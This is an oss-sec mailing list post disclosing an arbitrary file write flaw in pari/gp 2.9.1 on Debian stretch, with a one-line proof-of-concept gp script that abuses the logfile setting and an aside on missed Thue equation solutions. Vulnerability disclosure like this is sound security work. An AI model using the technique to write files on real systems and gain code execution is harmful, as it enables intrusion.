oss-sec mailing list archives
pari/gp arbitrary file write
From: Georgi Guninski <gguninski () gmail com>
Date: Mon, 1 Jul 2019 10:32:17 +0300
pari/gp is CAS (computer algebra system). pari/gp version 2.9.1 on debian stretch allows arbitrary file write and hence arbitrary code execution. poc: ======== \\ a.gp \\ to run: \r a.gp default("logfile","/tmp/a.txt");default("log",1);print("log(1)"); ======== Of mathematical interest is pari was missing solutions to Thue equations when assuming GRH (the fix changed polynomial bound to exponential bound): http://pari.math.u-bordeaux.fr/archives/pari-dev-1207/msg00000.html t=thue(thueinit(x^3+92*x+1,0),3^3);t -- joro http://www.guninski.com https://j.ludost.net/resumegg.pdf
Current thread:
- pari/gp arbitrary file write Georgi Guninski (Jul 01)